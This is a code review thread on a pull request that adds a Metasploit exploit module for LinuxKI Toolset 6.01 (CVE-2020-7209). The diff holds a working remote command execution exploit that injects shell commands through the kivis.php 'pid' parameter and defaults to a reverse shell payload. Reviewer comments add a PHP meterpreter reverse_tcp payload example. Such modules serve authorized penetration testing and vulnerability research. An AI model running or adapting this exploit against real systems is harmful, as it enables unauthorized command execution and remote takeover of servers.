modules/exploits/linux/http/linuxki_rce.rb

```diff
@@ -0,0 +1,92 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+        update_info(
+          info,
+          'Name' => 'LinuxKI Toolset 6.01 Remote Command Execution',
+          'Description' => %q{
+            This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
+            The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
+          },
+          'License' => MSF_LICENSE,
+          'Author' =>
+              [
+                'Cody Winkler', # discovery and poc
+                'numan türle' # msf exploit
+              ],
+          'References' =>
+              [
+                ['EDB', '48483'],
+                ['CVE', '2020-7209'],
+                ['PACKETSTORM', '157739'],
+                ['URL', 'https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78']
+              ],
+          'Privileged' => false,
+          'Platform' => %w[unix],
+          'Arch' => [ARCH_CMD],
+          'Targets' =>
+              [
+                [
+                  'Automatic (Unix In-Memory)',
+                  'Platform' => 'unix',
+                  'Arch' => ARCH_CMD,
+                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+                  'Type' => :unix_memory
+                ]
+              ],
+          'DisclosureDate' => 'May 17 2020',
+          'DefaultTarget' => 0
+        )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The path to the web application', '/']),
+    ])
+  end
+
+  def check
+    findstr = Rex::Text.rand_text_alphanumeric(10..15)
+    res = execute_command("echo '#{findstr}'")
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if (res.code == 404) || (res.code == 403)
+    if (res.code == 200) && res.body.include?(findstr)
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'linuxki/experimental/vis/', 'kivis.php'),
+      'vars_get' => {
+        'type' => 'kitrace',
+        'pid' => "1;#{cmd};"
+      }
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+  end
+
+  def exploit
+    print_status('Sending payload...')
+    if payload.arch.first == 'cmd'
```

Comment:
We usually prefer using the Target `Type` field:
```suggestion
    if target['Type'] == :unix_memory
```

Reply:
I didn't know how I could do that now, I got it better now. thank you for your contributions ❤️

Reply:
Is it possible to automatically reset the payload when the target changes?

Reply:
Absolutely, you can add a default payload per target. It will be automatically selected when the target changes. For example:
```ruby
                [
                  'Automatic (PHP In-Memory)',
                  'Platform' => 'php',
                  'Arch' => ARCH_PHP,
                  'Type' => :php_memory,
                  'Payload' => { 'BadChars' => "'" },
                  'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
                ],
```